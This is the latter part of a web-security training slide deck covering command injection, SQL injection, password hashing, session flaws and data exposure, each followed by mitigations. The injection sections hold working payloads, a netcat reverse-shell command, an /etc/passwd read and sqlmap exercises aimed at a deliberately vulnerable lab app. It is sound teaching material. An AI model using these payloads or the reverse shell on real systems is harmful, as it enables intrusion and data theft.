system("rm '" . $_GET['filename'] . "'");
```
---
# Command injection
<img src="deletefile2.png" width="100%">

Payload:
```
aa'; uname -a #
```
```php
system("rm '" . $_GET['filename'] . "'");
system("rm 'aa'; uname -a #'");
```
---
# Command injection
command separator: 
```bash
;
```
and:
```bash
&amp;&amp;
```
comment out the rest of the line: 
```bash
#
```
---
# Exercise
1. Start "Damn Vulnerable Web App (DVWA)" - check readme.txt
2. Exploit the command injection vulnerability
3. Get the contents of the `/etc/passwd` file
4. Change DVWA security level from "low" to "medium" and attempt to exploit the vulnerability again
4. Start a local netcat listener in a terminal and use the command injection to launch a reverse shell from the webserver
	- Netcat listener: `nc -l -v -p 4444`
	- Reverse shell: `nc -e /bin/bash 127.0.0.1 4444`
5. Change DVWA security level from "medium" to "high" and attempt to exploit the vulnerability again
---
class: middle, center
# Command injection mitigation
---
# Command injection mitigation

1. Whitelist user input, or
2. Input filtering
---
# Command injection mitigation
```html
<p>Enter filename to delete</p>
<form method="get">
   <input type="text" name="filename">
   <input type="submit">
</form>
<?php
	$input = $_GET['filename'];
   if (isset( $input) ){

	    echo "Deleting file...";
		if ($input === "summer.jpg") {
		   system("rm '" . $input . "'");
		} elseif ($input === "autumn.jpg") {
		   system("rm '" . $input . "'");
		} elseif ($input === "winter.jpg") {
		   system("rm '" . $input . "'");
		} else {
		   echo "Error! File not whitelisted!"
		}
   }
?>
```
---
# Command injection mitigation
DVWA command injection level: impossible
```php
$target = $_REQUEST[ 'ip' ];
$target = stripslashes( $target );

$octet = explode( ".", $target );

if( ( is_numeric( $octet[0] ) ) &&
	( is_numeric( $octet[1] ) ) &&
	( is_numeric( $octet[2] ) ) &&
	( is_numeric( $octet[3] ) ) &&
	( sizeof( $octet ) == 4 ) ) {

	$target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];

	if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
		$cmd = shell_exec( 'ping  ' . $target );
	}
	else {
		$cmd = shell_exec( 'ping  -c 4 ' . $target );
	}

	echo "<pre>{$cmd}</pre>";
} else {
	echo '<pre>ERROR: You have entered an invalid IP.</pre>';
}
```
---
# Conclusion
- Never trust unfiltered user input as part of a system command or `eval()` argument
---
class: middle, center
# SQL injection (SQLi)
---
# SQLi
Goal: Execute SQL queries against the web application's database
---
# SQLi
Table:
```
+-USERS----+----------+
| username | password |
+---------------------+
| admin    | pass123  |
| kevin    | m0ney    |
| john     | 619air   |
+----------+----------+
```
Query:
```SQL
SELECT * FROM users WHERE username='kevin' AND password='m0ney';
```
Result:
```
+----------+----------+
| kevin    | m0ney    |
+----------+----------+
```
---
# SQLi
```PHP
$query = "SELECT * FROM users WHERE username='" . $_GET['username'] .
         "' AND password='" . $_GET['password'] . "';";
```
If we set username to:
```
admin';--
```

Query becomes:
```SQL
SELECT * FROM users WHERE username='admin';--' AND password='';
```
Result:

?
---
# SQLi
```PHP
$query = "SELECT * FROM users WHERE username='" . $_GET['username'] .
         "' AND password='" . $_GET['password'] . "';";
```
If we set username to: 
```
admin';--
```

Query becomes:
```SQL
SELECT * FROM users WHERE username='admin';--' AND password='';
```
Result:
```
+---------------------+
| admin    | pass123  |
+---------------------+
```
---
# SQLi
```PHP
$query = "SELECT * FROM users WHERE username='" . $_GET['username'] .
         "' AND password='" . $_GET['password'] . "';";
```
If we set username to `admin` and password to:
```
' OR '1'='1
```
Query becomes:
```SQL
SELECT * FROM users WHERE username='admin' AND password='' OR '1'='1';
```
Result:

?
---
# SQLi
```PHP
$query = "SELECT * FROM users WHERE username='" . $_GET['username'] .
         "' AND password='" . $_GET['password'] . "';";
```
If we set username to `admin` and password to:
```
' OR '1'='1
```
Query becomes:
```SQL
SELECT * FROM users WHERE username='admin' AND password='' OR '1'='1';
```
Result:
```
+---------------------+
| admin    | pass123  |
| kevin    | m0ney    |
| john     | 619air   |
+----------+----------+
```
---
# SQLi

```SQL
SELECT * FROM users WHERE username='admin' AND password='' OR '1'='1';
```
<img src="downarrow.png" width="5%" style="box-shadow:none;display: block; margin-left: auto; margin-right: auto;">
```SQL
SELECT * FROM users WHERE (username='admin' AND password='') OR ('1'='1');
                                             ^                     ^
                                             |                     |
                         is evaluated first, returns nothing       |
                                                                   |
                              is evaluated secondly, returns all items in table
```
full list of operator precedence: https://dev.mysql.com/doc/refman/5.7/en/operator-precedence.html
---
# Blind SQLi
A SQLi is said to be "blind" if the attacker get no feedback regardless wether the query was successfull or caused an exception.
---
# Blind SQLi
A SQLi is said to be "blind" if the attacker get no feedback regardless wether the query was successfull or caused an exception.

Exploitation: make the request take more time if it was successful. (this is known as a side channel)
---
# Blind SQLi
```sql
# MySQL
SELECT * FROM products WHERE id=1-SLEEP(15)
SELECT * FROM products WHERE id=1-BENCHMARK(100000000, rand())

# SQLServer
SELECT * FROM products WHERE id=1; WAIT FOR DELAY '00:00:15'
SELECT * FROM products WHERE id=1; IF SYSTEM_USER='sa' WAIT FOR DELAY '00:00:15'

# Oracle
BEGIN DBMS_LOCK.SLEEP(15); END;
```
---
# Blind SQLi
```sql
SELECT
	IF(SUBSTRING(user_password,1,1) = CHAR(65),SLEEP(2),null)
FROM
	users WHERE user_id = 1;
```
`char(65)` is "A"
(http://www.asciitable.com/)
---
# Exercise
1. start Damn Vulnerable Web App (DVWA) - check readme.txt
2. Exploit the SQLi
3. Use `sqlmap` to exploit the SQLi (run `sqlmap -hh` for help)
5. Proxy `sqlmap` through burp so that you can see what's going on. Look at `sqlmap`'s traffic. (`--proxy=http://127.0.0.1:8080`)
7. Dump entire database using `sqlmap` (without proxying through burp)
0. Get remote code execution using `sqlmap` (without proxying through burp)
11. Get remote code execution again using `sqlmap`, this time while proxying through burp. How does `sqlmap` get code execution?

note: `sqlmap` caches previous responses locally. Run `sqlmap --purge-output`.
If things get wrid, and make sure that your session is still valid

---
class: middle, center
# SQLi mitigation
---
# SQLi mitigation

```SQL
                                      +---- data ---------+
                                      |                   |
                                      v                   v
SELECT * FROM users WHERE username='kevin' AND password='m0ney';
  ^    ^  ^     ^     ^       ^             ^     ^
  |    |  |     |     |       |             |     |
  +-------------------- query --------------------+
```

Solution: separate query and data
---
# SQLi mitigation

```php
$stmt = $conn->prepare("SELECT * FROM users WHERE username=? AND password=?");
$stmt->bind_param("ss", $username, $password);
```

```SQL
admin';--
```
becomes
```SQL
admin'';--
```
' is the escape character
---
# SQLi mitigation
```c#
private static void UpdateDemographics(Int32 customerID,
    string demoXml, string connectionString)
{
    string commandText = "UPDATE Sales.Store SET Demographics = @demographics "
        + "WHERE CustomerID = @ID;";

    using (SqlConnection connection = new SqlConnection(connectionString))
    {
        SqlCommand command = new SqlCommand(commandText, connection);
        command.Parameters.Add("@ID", SqlDbType.Int);
        command.Parameters["@ID"].Value = customerID;

        command.Parameters.AddWithValue("@demographics", demoXml);

        try
        {
            connection.Open();
            Int32 rowsAffected = command.ExecuteNonQuery();
            Console.WriteLine("RowsAffected: {0}", rowsAffected);
        }
        catch (Exception ex)
        {
            Console.WriteLine(ex.Message);
        }
    }
}
```
---
### Mandatory xkcd reference #1 (https://xkcd.com/327/)

<img src="exploits_of_a_mom.png" width="100%">
---
# Conclusion
- Never concatenate data and query
- Use prepared statements
---
class: middle, center
# Authentication and Session Management
---
# Authentication and Session Management
Category of misconfigurations/vulnerabilitites which result in weak authentication or session management
---
# Authentication and Session Management
- Weak protection of stored credentials
- Guessable credentials
- Overwrite credentials
- SessionID is exposed
- SessionID is "fixable" (session fixation)
- Sessions are not invalidated upon logout
- Sessions don't expire
- SessionID is reused
- Credentials are transmitted without transport level encryption
---
# Weak protection of stored credentials
```
+-USERS----+----------+
| username | password |
+---------------------+
| admin    | pass123  |
| kevin    | m0ney    |
| john     | 619air   |
+----------+----------+
```
---
class: middle, center
# Password hashing
---
# Password hashing
Goal: ensure that it is impossible to learn the passwords in the event that an attacker gains access to the database
---
# Password hashing
Goal: ensure that it is ~~impossible~~ **impractical** to learn the passwords in the event that an attacker gains access to the database
---
# Password hashing
"One-way Hash Functions"

<img src="hash-function.png" width="60%" class="c">
source: https://simple.wikipedia.org/wiki/Hash_function#/media/File:Hash_function.svg
---
# MD5 password hashing
- md5(`pass123`) == `32250170a0dca92d53ec9624f336ca24`
- md5(`m0ney`)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;== `8d717d103f782b5079b525a4d474750f`
- md5(`619air`)&nbsp;&nbsp;&nbsp;== `fa5ee85167943edb3649af8c54d99558`
---
# MD5 password hashing
```
+-USERS----+----------------------------------+
| username | password_hash                    |
+---------------------------------------------+
| admin    | 32250170a0dca92d53ec9624f336ca24 |
| kevin    | 8d717d103f782b5079b525a4d474750f |
| john     | fa5ee85167943edb3649af8c54d99558 |
+----------+----------------------------------+
```
---
# MD5 password hashing
```
+-USERS----+----------------------------------+
| username | password_hash                    |
+---------------------------------------------+
| admin    | 32250170a0dca92d53ec9624f336ca24 |
| kevin    | 8d717d103f782b5079b525a4d474750f |
| john     | fa5ee85167943edb3649af8c54d99558 |
+----------+----------------------------------+
```
```php
$stmt = $conn->prepare("SELECT * FROM users WHERE username=? AND password_hash=?");
$stmt->bind_param("ss", $username, md5($password));
```
---
# Password cracking (8x Nvidia GTX 1080)

Algorithm          | speed
-------------------|-------------
MD5                | 200.3 GH/s
SHA1               | 68771.0 MH/s
SHA256             | 23012.1 MH/s
SHA384             | 8408.5 MH/s
SHA256             | 8624.7 MH/s
SHA-3              | 6495.6 MH/s
PBKDF2-HMAC-MD5    | 59296.5 kH/s
PBKDF2-HMAC-SHA1   | 26156.2 kH/s
PBKDF2-HMAC-SHA256 | 9473.2 kH/s
PBKDF2-HMAC-SHA512 | 3450.1 kH/s
OSX 10.8+          | 98618 H/s
sha512crypt        | 1168.6 kH/s
WPA/WPA2           | 3177.6 kH/s
NetNTLMv1          | 179.3 GH/s
NetNTLMv2          | 13149.5 MH/s

source: https://gist.github.com/epixoip/a83d38f412b4737e99bbef804a270c40
---
# PBKDF2-HMAC-SHA256

```php
function myhash($password, $salt, $iterations) {
	return hash_pbkdf2("sha512", $password, $salt, $iterations);
}
```
---
# PBKDF2-HMAC-SHA256

```php
function myhash($password, $salt, $iterations) {
	return hash_pbkdf2("sha512", $password, $salt, $iterations);
}

echo myhash("pass123", "0hK53wquk", 1000);
// dc8fb849620e7d1d7ba103da70a1156b2734f20178e1db32024712a546127b110530732aa1d8
// 10592989eef5c9e77e15c4c3cac0f725f5e6a9586b201e969c8b

echo myhash("m0ney", "yEQ9PjDRZg", 1000);
// 731dbe6af2208ae383671ef2f51e747a923bc25e4c5cb367a32f9c4dbe297af84652e961ea45
// faaaa610af36f6b8cb0dfc573f951174454537e6169c0d70d4af

echo myhash("619air", "2jLyqfZ3E1", 1000);
// 32194a4ac44c403cee1f88f756e0631a3996e61a0879cbd129d87357d223dcad56af18900edc
// ae88a1f3ef571a7b05b38c742621133445f5241ee04be67897a4
```
```
+----------+---------------+------------+------------+
| username | password_hash | salt       | iterations |
+---------------------------------------+------------+
| admin    | dc8fb84962... | 0hK53wquk  | 1000       |
| kevin    | 731dbe6af2... | yEQ9PjDRZg | 1000       |
| john     | 32194a4ac4... | 2jLyqfZ3E1 | 1000       |
+----------+---------------+------------+------------+
```
---
# Iterations
- As many as practically possible for your users (usability vs security)
- Must increase over time as hardware becomes faster
---
# Salt

Purpose: prevent precomputation attacks by making hash unique

`hashFunction(password + salt) = hash`

- Salt **must** be unqiue per user
---
# Precomputation attacks

<img src="googlehash.png" width="100%" class="c">
---
# Precomputation attacks
Rainbow table - precomputed table of plaintext passwords and their corresponding hash.
Example:

```
a:0cc175b9c0f1b6a831c399e269772661
b:92eb5ffee6ae2fec3ad71c777531578f
c:4a8a08f09d37b73795649038408b5f33
d:8277e0910d750195b448797616e091ad
e:e1671797c52e15f763380b45e841ec32
...
```
Download LM/NTLM/MD5/SHA1 tables here: http://project-rainbowcrack.com/table.htm
---
# RainbowCrack screenshot
<img src="rainbowcrack.png" width="100%" class="c">
---
# Password hashing conclusion

- Hash and salt credentials
- Use a hashing algorithm that is sufficiently slow
- Do **NOT** implement your own hashing algorithm
---
class: middle, center
# Guessable credentials
---
# Guessable credentials
- Minimum password length, e.g. 12 characters or as long as practically possible (usability)
- Add a blacklist of known weak passwords e.g.
 - `Summer17`
 - `Summer2017`
 - `Password1`
 - `C0mpanyname`
 - `Companyname1`
 - `Companyname1!`
 - `Companyname123`
- Industry standard: require at least three of the following categories:
 - lowercase characters
 - Uppercase characters
 - digits
 - symbols
---
### Mandatory xkcd reference #2 (https://xkcd.com/936/)
<img src="password_strength.png" width="88%" class="c ns">
---
class: middle, center
### Rule of thumb: length (almost) always beats complexity
---
## Examples where length does **not** beat complexity:
- `aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...` (max length)
- `bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb...` (max length)
- `000000000000000000000000000000000000000000000000000000...` (max length)
- etc
---
class: middle, center
## Encourage your users to use password managers!
---
# Guessable passwords conclusion
- Enforce strong passwords
- Blacklist strong but easily guessable passwords
- Encourage the use of password managers
---
class: middle, center
# Overwrite credentials
---
# Overwrite credentials
- Create new account with same account name as victim account?
- Weak or insecure password reset functionality?
- Guess user's SessionID and change password?
 - Missing password confirmation on change password or update email address?
---
# Overwrite credentials
There is no silver bullet!
- Require password confirmation on security related functionality (change password, update e-mail etc)
- Ensure hard-to-guess SessionIDs
---
# Overwrite credentials conclusion
- Ensure that functionality which is directly or indirectly related to the security of an account follows security industry standard and best practice
---
class: middle, center
# Session token exposure
---
# Session token exposure
Exposure of session tokens potentially makes users vulnerable to session re-use. Session token in URL means that the session token is saved in:
 - Browser history
 - Proxy cache
 - Load balancer cache
 - Web server access log
 - HTTP referer header e.g. session token is readable by externally linked sites

```http
GET /somePage.aspx HTTP/1.1
Host: external-page.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Referer: http://example.com/something.aspx?SessionID=573deb8b889a38b32dbe535e3dc0affb
Connection: close
```
---
# Session token exposure conclusion
- **Never** store session token in URL or any other location which is cached stored
- Keep secrets in Cookies or custom HTTP headers which are not leaked to third parties
---
class: middle, center
# Missing termination of SessionID on logout
---
# Missing termination of SessionID on logout
Attack scenario:
1. Victim authenticates, receives SessionID
2. Victim does what he/she needs to do
3. Victim logs out, server does **not** terminate the SessionID server-side.
4. Attacker somehow learns the old SessionID
5. Attacker now has access to the victim's account, since the server still accepts the SessionID which is still valid.

Common root-causes: developer thinks it's enough to just clear the cookie in the browser
---
# Missing termination of SessionID on logout conclusion
- **always** terminate the SessionID serverside such that the old SessionID is not tied to an active/valid session
---
class: middle, center
# Session fixation
---
# Session fixation
Spot the problem(s).
```http
POST /login.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 105
Cookie: SessionID=573deb8b889a38b32dbe535e3dc0affb
Connection: close

username=kevin&password=m0ney
```
```http
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1270
Set-Cookie: SessionID=573deb8b889a38b32dbe535e3dc0affb; path=/
Connection: close

<!doctype html>
<html>
...
Authentication succeeded. Welcome, Kevin!
```
---
# Session fixation
Attack scenario:
1. Victim logs in, received new SessionID
2. Victim logs out, terminating the session
3. Attacker gets read access to the SessionID somehow. This should **not** be a problem since the session is terminated server-side (or should be, anyway)
4. Victim logs in using the same browser as before, which still has the SessionID cookie from the last session (should not be a problem)
5. Attacker now has access to the victims account because the attacker has the SessionID, which is now tied to a valid session

note: this attack gets even worse if the SessionID is supplied in the URL, as then the attack does not rely on the victim+attacker sharing the same browser
---
# Session fixation conclusion
- A **new** SessionID should **always** be generated upon login
---
class: middle, center
## No server-side terimination of session upon logout
---
## No server-side terimination of session upon logout
Attack scenario:
1. Victim logs in, received new SessionID
2. Victim logs out, terminating the session
3. Attacker gets read access to the SessionID somehow
4. Attacker now has access to the victims account because the SessionID was never terminated server-side

Conclusion:
- Always terminate sessions server-side
- Clients should repeat the logout request until server confirms that session has been terminated
---
class: middle, center
# Sessions don't expire
---
# Sessions don't expire
Attack scenario:
1. Victim logs in, received new SessionID
2. Victim forgets to log out
3. Time passes
4. Attacker gets read access to the SessionID somehow
5. Attacker now has access to the victims account
---
class: middle, center
# Session ID is reused
---
# Session ID is reused
Attack scenario 1:
1. Victim logs into account, receives SessionID
2. Victim logs out
3. Attacker somehow gets read access to SessionID
4. Victim logs on again, receiving same SessionID as before
5. Attacker now has access to the victim's account
---
# Session ID is reused
Attack scenario 2:
1. Attacker logs into own account, receives SessionID
2. Attacker saves SessionID offline
3. Attacker logs out and logs on again, goto #2 - Process is repeated
4. At some point, victim users log in
5. When enough SessionIDs have been saved and some time has passed, attacker tests if the SessionIDs are tied to a valid session
6. Attacker now has access to valid sessions of a victim user
---
# Session ID reuse conclusion

- Always assign unique SessionIDs on all logins
---
class: middle, center
# Credentials are transmitted without transport layer encryption
(Missing TLE)
---
# Missing TLE
Attack scenario

1. Attacker gains a suitable position on the network route for interception of traffic (MitM/Man in the Middle) somehow
  - ARP poisoning 
  - ICMP type 5 redirect
  - Rogue DHCP
  - IPv6 router advertisements
  - ...
2. Victim authenticates - attacker intercepts the username and password as well as the SessionID of the victim
---
# Missing TLE conclusion

- Use transport layer encryption such as TLS for all communication
- Teach users that your site should **never** be access over plaintext HTTP
	- Teach users what to look for
---
class: middle, center
# Third party components
---
<img class="c" src="cvedetails.png" width="105%">
---
<img class="c" src="androidlist.png" width="70%">
---
# Android usage statistics
September, 2017

<img src="android-usage-september-2017.png" width="70%">

source: https://fossbytes.com/most-popular-android-versions-always-updated/
---
<img src="android6.0vulns.png" width="120%">
---
<img src="springlist.png" width="90%">
---
<img src="spring3.0.2.png" width="140%">
---
<img src="cve-2010-1622.png" width="85%">
---
<img src="springexploit.png" width="85%">
---
# Tools
Example whitebox vulnerability scanners / static code analysers:
- OWASP Dependency-Check https://www.owasp.org/index.php/OWASP_Dependency_Check 
- Retire.js https://retirejs.github.io/

Example blackbox vulnerability scanners:

- Nessus
- WPScan

---
# Nessus
<img src="nessus.png" width="100%">
sample reports: https://www.tenable.com/products/nessus/sample-reports
---
<img src="wpscan.png" width="150%">
---
# Exercises

1. Find software projects
	- if online, go to e.g. GitHub
		- search for e.g. "CMS"/"gallery"/"blog"
	- if offline, go to `~/examples/`
2. Scan it with `Dependency-Check`
3. Scan it with `retire`
4. Run `searchsploit <searchstring>` from your terminal and see if you can find exploits
5. Search for known vulnerabilitites in third party components in your own projects
---
# Conclusion
- Third party components should be checked for vulnerabilities:
	- when integreted
	- regulairly

- Choose components where the authors have a proven track record of fixing discovered vulnerabilities

- Static code analysers (SCA) such as `Dependency-Check` and `retire` should be integrated in build scripts, and should fail the build if vulnerabilities are found

	- or make buildserver run SCA regulairly - and remember to update the tool's databases!
---
class: center, middle
# Broken Access Control
---
# Broken Access Control

```html
<script>
	function validateForm() {
		var x = document.forms["myForm"]["fname"].value;
		if (x.length > 32) {
			alert("Name cannot be longer than 32 characters");
			return false;
		}
	}
</script>

<form name="myForm" action="/add.aspx" onsubmit="return validateForm()">
	Name: <input type="text" name="fname">
	<input type="submit" value="Submit">
</form>
```
---
# Broken Access Control

<img src="client-side-validation.jpg" width="90%" >
---
class: center, middle
<img src="downarrow.png" width="5%" style="visibility:hidden;box-shadow:none;margin-left:58%;">
`http://example.com/download?type=transactions&account=487002&format=pdf`
<img src="downarrow.png" width="5%" style="visibility:hidden;box-shadow:none;margin-left:58%;">
---
class: center, middle
<img src="downarrow.png" width="5%" style="box-shadow:none;margin-left:58%;">
`http://example.com/download?type=transactions&account=487002&format=pdf`
<img src="downarrow.png" width="5%" style="visibility:hidden;box-shadow:none;margin-left:58%;">
---
class: center, middle
<img src="downarrow.png" width="5%" style="box-shadow:none;margin-left:58%;">
`http://example.com/download?type=transactions&account=487002&format=pdf`

Can we change it to someone else's account number?
---
# Conclusion
- Always verify input (which we do not strictly control ourselves)
---
class: middle, center
# Sensitive Data Exposure
---
# Sensitive Data Exposure
What's the problem?
```HTTP
HTTP/1.1 200 OK
Server: Apache/1.3.22 (Unix) OpenSSL/1.0.2l PHP/7.1.7 mod_perl/2.0.8-dev
   Perl/v5.16.3 mod_ssl/2.8.6
X-Powered-By: PHP/7.1.7
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Content-Length: 351
```
---
# Sensitive Data Exposure
What's the problem?
```HTTP
HTTP/1.1 200 OK
Server: Apache/1.3.22 (Unix) OpenSSL/1.0.2l PHP/7.1.7 mod_perl/2.0.8-dev
   Perl/v5.16.3 mod_ssl/2.8.6
X-Powered-By: PHP/7.1.7
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Content-Length: 351
```
Leaks:
- Operating system
- Web server software and detailed version
- OpenSSL version
- PHP version
- Perl version
- mod_perl version (Apache plugin)
---
# Sensitive Data Exposure
What's the problem?
```HTTP
HTTP/1.1 200 OK
Server: Apache/1.3.22 (Unix) OpenSSL/1.0.2l PHP/7.1.7 mod_perl/2.0.8-dev
   Perl/v5.16.3 mod_ssl/2.8.6
X-Powered-By: PHP/7.1.7
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Content-Length: 351
```
Leaks:
- Operating system
- Web server software and detailed version
- OpenSSL version
- PHP version
- Perl version
- mod_perl version (Apache plugin)

https://www.exploit-db.com/exploits/764/
---
# Sensitive Data Exposure
- Data at rest
- Data in transit
---
### What's the problem?
<img src="exception.png" width="120%" class="c">
---
# Problems
- Leaks source code
- Leaks call stack

Aids an attacker in attacking the system!
---
<img src="net1.png" width="80%" class="ns c">
---
<img src="net2.png" width="90%" class="ns c">
---
<img src="net3.png" width="90%" class="ns c">
---
<img src="net4.png" width="90%" class="ns c">
---
# Homework
1. Browse https://wordpress.org/plugins/ and find a wordpress plugin which seems to be new, unpopular, or of low quality
2. Search for vulnerabilities in it
3. `if (foundVulnerabilities == 0) goto #1`
4. Play a wargame: Natas @ overthewire http://overthewire.org/wargames/natas/
---
class: middle, center
# Questions?
slides: http://dumpco.re/websec
    </textarea>
    <script src="remark.js">
    </script>
    <script>
      var slideshow = remark.create();
    </script>
  </body>
</html>
